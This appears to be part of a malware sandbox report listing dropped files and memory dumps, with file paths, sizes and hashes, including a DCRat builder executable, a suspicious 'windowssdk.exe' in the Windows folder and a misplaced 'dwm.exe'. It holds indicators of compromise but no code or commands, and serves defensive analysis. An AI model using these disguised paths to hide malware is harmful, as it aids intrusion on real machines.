a71a724daf1615508d30f2256a9dcfd8

SHA1
df82cdbc2ffc0e6eec21f5727f4d3da606af7f29

SHA256
b3294a0dd7faa5b6c378bd1f3cc98d2b913e5cbf01ab2bea618d3e91f21118c0

SHA512
d64144b87979ebf7fb2603291aad06a8c1c0fc4c6e55560139186c2367f36bc97787b0a1e9fe49a6c3065436198aee4c098c952852c1df8b95772ec1cb9ac86d

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\sessionstore-backups\recovery.baklz4

Filesize
17KB

MD5
a9a826e62bb53a8adaaf68cf0b73fec2

SHA1
61006f195df5c7582511dbb4639c57a702bb1e5f

SHA256
0e2c0ec6952b0c8785f344c804b01b29f62872b1e21412d39e4bb925ea8487fd

SHA512
d1f9dc90da576b5c07af82d11d6a04c148e3d126c82f58f8a8dfcece4ed057730f7ec1f9f448a037be092ccbb5d5604633532e2a5cf953480f042c066042f4a0

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\sessionstore-backups\recovery.baklz4

Filesize
17KB

MD5
9a26f1beae0f20be5aeca15eefd06fd7

SHA1
8940ab2bf23b6a86413212ecc0d080bf4d0ecad8

SHA256
281499c8e69260cc4d843f86a523ac45a027b68932bbaf42e284111c8fdf1339

SHA512
48524b070bb8a0bbdb8faaaf64de1f986cf21e1664845e10f6091b970c1c680c82fd46839655ef84b7df2858bc0faed99ed2d5a3faf31868cafdce0578e26da8

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\sessionstore-backups\recovery.baklz4

Filesize
17KB

MD5
ebc4a73471016936bf7647ac672a0bab

SHA1
cc66ca3253656e976ad52d60f53d3ca5db1705c7

SHA256
b975b48212db9692ca7660b0703812c1d17d8a5f4731e7dff0d2003fa94b0402

SHA512
d39961d5330dc167827ea1308f460f8fccacbf9ab2249d48a768919f5eb95ab90ac9b5a7b641d7f6ce9dac091b2e3047b58380685ffc2dbec9b2374492e4f25e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\sessionstore-backups\recovery.baklz4

Filesize
17KB

MD5
40cbf1b87ecf7c8f77bce8790ce52110

SHA1
1bc32edd5881712640c0005c718d48ceccd7959d

SHA256
7f223e4198f815678c877a4a3e40a30e2903578a9034fff85d609941ec4a7e4c

SHA512
7d212b943a8bc6ba8fc9d3fe84da265ce5028924c170ff323e04d068ceaa37a2f3bac4b2e73b9d2c942e8e5288a61f52271cfdee4a9f582537aa9a8576440aa4

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\sessionstore-backups\recovery.baklz4

Filesize
17KB

MD5
17da1b0653a76e697cd3d2d9eecd9166

SHA1
183abe76cc08311ede74476ddbc147cf63eda794

SHA256
3a7a49baa752182cc661573c931d4af70cd56163c5195984d723f0a3ae0fa90b

SHA512
653429248412b89e902636c436b539d6daebb4fce090d1bf964d386b2d39a42f1b7b3177fa1e06152101285515dbc8c1d4c4d315f8992318a87d6ecf06677724

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\sessionstore-backups\recovery.baklz4

Filesize
16KB

MD5
85af220906844830c255ad00b3cfc52b

SHA1
881dbb207fc3be0ce55cd3a130b43257ace3b5dd

SHA256
01b64b6dbad2db8ef8c0fe0a6091ed3af3c71fa14b6888663fb894afe670f16a

SHA512
7890d7926a6020b8d5bf28814b40f93532b846350437d8a8db9b7f5700b76263e7516bdb3c67a2dd3d31c8f55f0966a599d760fbb714968c6758eb669ad91e8c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\sessionstore-backups\recovery.baklz4

Filesize
16KB

MD5
e0c0a7602e40486eb9ec3ab3856ad3f2

SHA1
bc6c2311f874430bcec8f0ba6077a8e043abb120

SHA256
d283c18a252169fab428ae302e6bcd950cdacb4c19f61734028d60a7b909bc3b

SHA512
5cb9c135d2e058cd7e275942dc2b0f1ea60e081ccd16f11695648faec7b157becd35f387f021fe2c2ca996489b24131eb44d67bbbd08838a988fb5ad80677928

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\sessionstore-backups\recovery.baklz4

Filesize
17KB

MD5
bf2e751547d705873db4da5f230e2238

SHA1
6503c17452f95141da4133384e1fbde68073e093

SHA256
49dbf6046312f284f1aa7c8331d944ca046be46cb9b7468a3add79a89cf0576f

SHA512
ff221e9f59df133a54c8c22d0f8522539636d5d5528f734954a641b87ced3fadad28483356ed0b70085ec0d8d9ad2e01fd495e7df708ce31ec2258f00826fdc3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\sessionstore.jsonlz4

Filesize
16KB

MD5
0ec614cb69048899e6e0d57935f0d84c

SHA1
74d635ee150ac491ddde5da67dc9fcf286881c5c

SHA256
0d807047c0937bae363e4de2b2e547e9d09f5bf2493915487750b0a7d6a469da

SHA512
516bcbe67f2597a6fabb16b9b51c6b0ad4aef1a77d33f14fcb5c13edbfadaf26a67335695494ade00d3e5adfb1970ee1448766e009d537c5ff3bd7341b9a7310

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\sessionstore.jsonlz4

Filesize
16KB

MD5
70fba83dee967b508ae3617484563ff5

SHA1
7f84564d42559a1fb1d3599dfdee405f2f1e0d4e

SHA256
4bc8306e2ebcb30c9ff0822d18b233caf2187442fdfddcbac51fe823ccd4641f

SHA512
9255a603e5d883a348ab0acd969c303899a48f969f8a84aa71fb227d4be5c287c3c554a1dd5283a525a69328b16581997fc8ab8dae3995a2844660b8045803c9

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\storage.sqlite

Filesize
5KB

MD5
1fff72758fc33f99c80653ffcd888766

SHA1
0fc1ce5534dd989c553e7e5aa89182ad95417935

SHA256
569102f65d57220c0fefd70867644229050273d9b2b2ad030251c2e75dfd2209

SHA512
ad589bfcebafaeb1583048ad2ef23b106d5cd30761362c65c1097d35fafa45b919b3583f65b5e7cffebad8cb4085a3e29f893e4581091030a02ecd12f2694ef0

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\storage\default\https+++cp.sprinthost.ru\ls\usage

Filesize
12B

MD5
6b7f179714f46028b2a9b53a6c23c9cf

SHA1
450a9a5f2317d1f28b7ddcd8dcf8313bfe91effa

SHA256
5a2e4041ea0e3353bf0a44efa26512bebe0c95cbb400fc472f74540fdf30c839

SHA512
79ea2e639ef5eb858535eebca3719275f08c284a23714948c1f4faf85ac145d526fcae8a34400ae6a41c1c1aef1bd5509ac601f3df988a83d4eafc61b91867ef

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\storage\default\https+++dzldp.columnstoodth.com\cache\morgue\191\{c6d1e191-0494-4151-a237-fef2e2ed82bf}.final

Filesize
19KB

MD5
d77a809c7e94d46e94637329f61f5d9a

SHA1
9371094d01902ca91612ef6c6e9d5c5561b91c7c

SHA256
f474339320237b9bee15fa00e82695bc7e75ce1b7123415d140bf480fd49f09c

SHA512
a5e794d090f349e74d7bcec1c7c9e917aec7c850bad3e2055688a6fd868a38e3ac1a077c74aca6c0f8a222669ce6fc7cc081b37067afb4b69a84033f03245143

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\storage\default\https+++dzldp.columnstoodth.com\idb\2728594770keeryovtasl-.sqlite

Filesize
48KB

MD5
01c4e01b949940bc71692041a0696a50

SHA1
fb66ca83f8073ba418dbb6b4fcfc72e88b1bff5c

SHA256
ce26000efbce04b35453cb239818bc562d5b1d1a047f7e1768fb6be0e6809dac

SHA512
db9cda68723262899ae31d40bb6be46a4a52c029b6e61255c3e40d59207b1dcb08064bb81145d500883fa9d328482a61e8373f43a3596d209d7972950fb1708b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\storage\default\https+++luipi.columnstoodth.com\cache\morgue\143\{79848d3f-bc1b-49e6-a716-87692d29738f}.final

Filesize
19KB

MD5
0b24ab9bdef8656d604ecb5805ce27f6

SHA1
074cfe2538ae482da04758b8aa221dd37e194ee1

SHA256
3a7ba15e0a8ce9585fdfdab851ea75d0133c31902b0eccabf0a696e7b89b4249

SHA512
aa6d5d4261efff1db1915b98f04fa186cc9bedaf30a82b45bd50ff08a9f04e5efcbbce9199955dcb4ab9a66d0ae69a729730d4760bf850994e865c452a7bb585

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\storage\default\https+++www.google.com^partitionKey=%28https%2Csprinthost.ru%29\ls\data.sqlite

Filesize
6KB

MD5
d37c8d7da8e939ac9f0a52162ce89754

SHA1
066e6e74ba1113321c3591974514f0ffa22e0135

SHA256
102433f7816bb67fb19f21497582cabaaf4b56588dcd88304d1734ef2cf173b2

SHA512
bd0c8de03111b66d0a5383d0e027882581ab9fdac6f90c35501f7409fbd1e0d580ac880b7bb83fea6f49497db2f895b8ebee2da71d271fac8d68335ac3085706

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\storage\default\https+++www.googletagmanager.com^partitionKey=%28https%2Ctastytabapp.com%29\cache\morgue\113\{dff973ae-6eae-4d36-a9df-8384a3f75c71}.final

Filesize
4KB

MD5
7fd116230491d5754c0b8b21d8aac3a4

SHA1
505c970507e1ee607f55221d72dd3c8d5c34a006

SHA256
c7e87cc66882a9f33a088046f6bccf88d71b3c746c737cd922845e4f964ddc3a

SHA512
2d782cac56b3691bb4189b85a4f2882ab30a5d23eb71e5db4aa04f27d19956cedc246213fcf66c333ce86cdd57a808a1cbebba54f885bc2e85b601d02a9c943c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite

Filesize
48KB

MD5
eda11e0b100ef5aa67d85ce044d9318b

SHA1
0a9c8572abf7eec05c4c48e93af6ac1c7272783a

SHA256
cc897fa3e1a6d1aef384069de3b622e5c680a6a6e83adcc3f5bbe0e9bf7a948d

SHA512
14a39f1d5d800299ff2d8b003451ac033a2fa47adfa7febdfcf18719ab1a7918c66b2f44a7661f8dcf99f6ca7b3303f87ad81cb3a27fc042e47ab98dbd48b2eb

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite

Filesize
48KB

MD5
90a2c819a32c04466e117de0302c1300

SHA1
f030487be96555d973a09da21c7aac677cf84a9f

SHA256
917fc704f91d6a04082c838784cf04cfde6666bb40406bf2d0e221fb4dca9fea

SHA512
fae2bc2ded50c4506665e974174ad09b7743b105256f954bec17b5d22056ed3e06ee0bae25749b8df9b7950a8215fb51870a0366674af8322e2cdfec8defcbfa

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Filesize
2.9MB

MD5
7309a0018550f7fbe22225eeba2b441f

SHA1
cdd18fe428794c440ab87e344fa9e862183c0858

SHA256
d17efdb986047c282f6e64d170ee306d8f8e02c88eaf2caa5282bdc298f798e6

SHA512
f031564ddb5bc1addbeff051de75d6f852c6d51a0513e31a5deade9c2e97023bdadd7514f4a87cf5514f44c7f608cb49e29d857cf31d8fe29f273e17c3602cbd

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Filesize
10.9MB

MD5
ec37583e170e3dbba7091556ec917c3e

SHA1
112d258198673c04aba14abafaf5832940677bbe

SHA256
7b5e2310ba174cea29151200a9fd9c006357f25445309295bf8f544d468974b4

SHA512
7db648a3ca7abf40b6ed9d82e35827e3135534d16529e2b78f8ff19742239183584d8cc28aba1824180b264148a5d00be7077fdd7e0e25731ccc409615ba819f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\xulstore.json

Filesize
141B

MD5
7024f51e37c5a76ded1584389944e871

SHA1
0c71c385f2e5a161a786950b52b057fb4f765811

SHA256
27ac09531254471e6a1cb4cdcfb0874dd4cb0b780de99312619b5790f2c2bb3f

SHA512
0933405d483a56d585581215e77cf7bd4901965a037d0b354447cbb402df96b451ec98d82e899cd43bed9e49537b4228a43c82a07dfe451d3823286166049e68

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\xulstore.json

Filesize
217B

MD5
4cbdfc4880bec82d84bce21747789706

SHA1
e11d96dba2f23684d3c47e915103fde230293a23

SHA256
09df9aeebf64843204519e11c0c2d42816576965866bac84aa1b0cb58945a910

SHA512
21ba56a3558b1f2e6dc2c2e6f7589d3d2d8371c924e066da961eed61b8423f520c5d1eb0aec3a00fb0032fa398d3cd3051d2f27976fbe5dc2a18777d8c71b456

Download Submit
C:\Users\Admin\Downloads\dcrat\DCRatBuilder.exe

Filesize
72KB

MD5
2c7d37e90dd8ab57d06dad5bc7956885

SHA1
da789c107c4c68b8250b6589e45e5a3cf7a9a143

SHA256
5ede5d774ab65f25357cf5a1fa5e354f6f2a9868651a0fa717485802b21b1939

SHA512
e74ae891771bfd9c6fcdfbe8e4f33f0d5f7c3457cd84b257500cdaf8fa8b16fe458a18db9b3a60591465982fc2871f4c3f2e7541c765f00a0516f805e7e9ca0f

Download Submit
C:\Windows\windowssdk.exe

Filesize
6.2MB

MD5
e58b6dba9e96f3f015010a7796676153

SHA1
bae94a6035fe295f803c12b7dbc85cac2bf120a0

SHA256
9e8a91ecf50a0e4d9cda2f80380345d8edba197551a2bc5c797cb43007fd8181

SHA512
1b357abde0a7fa9dca1e4cb1d15f250800bedf80faa25b8b211f51527484af392ae9d6b47fa6c512eea42124f523654ba92ac6e40aa15fc71d5c98cbfbbdbe59

Download Submit
C:\surrogatecontainerWebreviewSvc\dwm.exe

Filesize
829KB

MD5
3dc6daa07008b1f621ee458aa9f9b114

SHA1
7e7c4f441521b93274147213fff35237aae3bf3f

SHA256
ccfba0812b160a4e9d709ed4a5d96f73d4d83d615c43f56fea7b8e9a8a5c8348

SHA512
30e55a626243d5bf0bf2b275eebbab7bb1a04c9a7dc6dd3298b6b565973c928ecafa0b25dc0ae0ef67d802a488740b22510dacacf362d69c0534acc6718b590c

Download Submit
memory/1756-8602-0x000001D0EA030000-0x000001D0EA031000-memory.dmp

Filesize
4KB

Download
memory/1756-8486-0x000001D0EA030000-0x000001D0EA031000-memory.dmp

Filesize
4KB

Download
memory/1756-8567-0x000001D0EA030000-0x000001D0EA031000-memory.dmp

Filesize
4KB

Download
memory/1756-8578-0x000001D0EA030000-0x000001D0EA031000-memory.dmp

Filesize
4KB

Download
memory/1756-8627-0x000001D0EA030000-0x000001D0EA031000-memory.dmp

Filesize
4KB

Download
memory/1756-8545-0x000001D0EA030000-0x000001D0EA031000-memory.dmp

Filesize
4KB

Download
memory/1756-8623-0x000001D0EA030000-0x000001D0EA031000-memory.dmp

Filesize
4KB

Download
memory/1756-8558-0x000001D0EA030000-0x000001D0EA031000-memory.dmp

Filesize
4KB

Download
memory/1756-8562-0x000001D0EA030000-0x000001D0EA031000-memory.dmp

Filesize
4KB

Download
memory/1756-8645-0x000001D0EA030000-0x000001D0EA031000-memory.dmp

Filesize
4KB

Download
memory/1756-8603-0x000001D0EA030000-0x000001D0EA031000-memory.dmp

Filesize
4KB

Download
memory/1884-9589-0x0000000000820000-0x000000000082C000-memory.dmp

Filesize
48KB

Download
memory/2028-9674-0x0000000000450000-0x0000000000526000-memory.dmp

Filesize
856KB

Download
memory/2092-8488-0x0000000005B70000-0x0000000005B8E000-memory.dmp

Filesize
120KB

Download
memory/2092-8604-0x0000000007220000-0x000000000723A000-memory.dmp

Filesize
104KB

Download
memory/2092-8462-0x00000000046E0000-0x0000000004716000-memory.dmp

Filesize
216KB

Download
memory/2092-8541-0x0000000006F60000-0x0000000006F6A000-memory.dmp

Filesize
40KB

Download
memory/2092-8465-0x0000000004D90000-0x00000000053BA000-memory.dmp

Filesize
6.2MB

Download
memory/2092-8468-0x0000000004CF0000-0x0000000004D12000-memory.dmp

Filesize
136KB

Download
memory/2092-8473-0x00000000054F0000-0x0000000005556000-memory.dmp

Filesize
408KB

Download
memory/2092-8534-0x0000000006ED0000-0x0000000006EEA000-memory.dmp

Filesize
104KB

Download
memory/2092-8474-0x0000000005660000-0x00000000056C6000-memory.dmp

Filesize
408KB

Download
memory/2092-8485-0x0000000005720000-0x0000000005A77000-memory.dmp

Filesize
3.3MB

Download
memory/2092-8612-0x0000000007210000-0x0000000007218000-memory.dmp

Filesize
32KB

Download
memory/2092-8527-0x0000000006B90000-0x0000000006C34000-memory.dmp

Filesize
656KB

Download
memory/2092-8601-0x0000000007130000-0x0000000007145000-memory.dmp

Filesize
84KB

Download
memory/2092-8533-0x0000000007510000-0x0000000007B8A000-memory.dmp

Filesize
6.5MB

Download
memory/2092-8555-0x00000000070E0000-0x00000000070F1000-memory.dmp

Filesize
68KB

Download
memory/2092-8554-0x0000000007160000-0x00000000071F6000-memory.dmp

Filesize
600KB

Download
memory/2092-8489-0x0000000005BB0000-0x0000000005BFC000-memory.dmp

Filesize
304KB

Download
memory/2092-8523-0x0000000006B60000-0x0000000006B7E000-memory.dmp

Filesize
120KB

Download
memory/2092-8585-0x0000000007120000-0x000000000712E000-memory.dmp

Filesize
56KB

Download
memory/2092-8513-0x0000000006B20000-0x0000000006B54000-memory.dmp

Filesize
208KB

Download
memory/2092-8514-0x00000000714B0000-0x00000000714FC000-memory.dmp

Filesize
304KB

Download
memory/2976-9609-0x000001C76F600000-0x000001C76F60C000-memory.dmp

Filesize
48KB

Download
memory/2976-9610-0x000001C771C00000-0x000001C771D1E000-memory.dmp

Filesize
1.1MB

Download
memory/4772-9614-0x0000000000770000-0x000000000077A000-memory.dmp

Filesize
40KB

Download
memory/6432-9618-0x0000000005270000-0x000000000527A000-memory.dmp

Filesize
40KB

Download
memory/6432-9616-0x00000000055C0000-0x0000000005B66000-memory.dmp

Filesize
5.6MB

Download
memory/6432-9627-0x0000000008040000-0x0000000008048000-memory.dmp

Filesize
32KB

Download
memory/6432-9615-0x0000000000080000-0x0000000000678000-memory.dmp

Filesize
6.0MB

Download
memory/6432-9617-0x0000000005010000-0x00000000050A2000-memory.dmp

Filesize
584KB

Download
memory/7012-8461-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/8156-8617-0x00007FF745520000-0x00007FF745CA7000-memory.dmp

Filesize
7.5MB

Download
memory/8156-9577-0x00007FF745520000-0x00007FF745CA7000-memory.dmp

Filesize
7.5MB

Download
memory/8156-8459-0x00007FF745520000-0x00007FF745CA7000-memory.dmp

Filesize
7.5MB

Download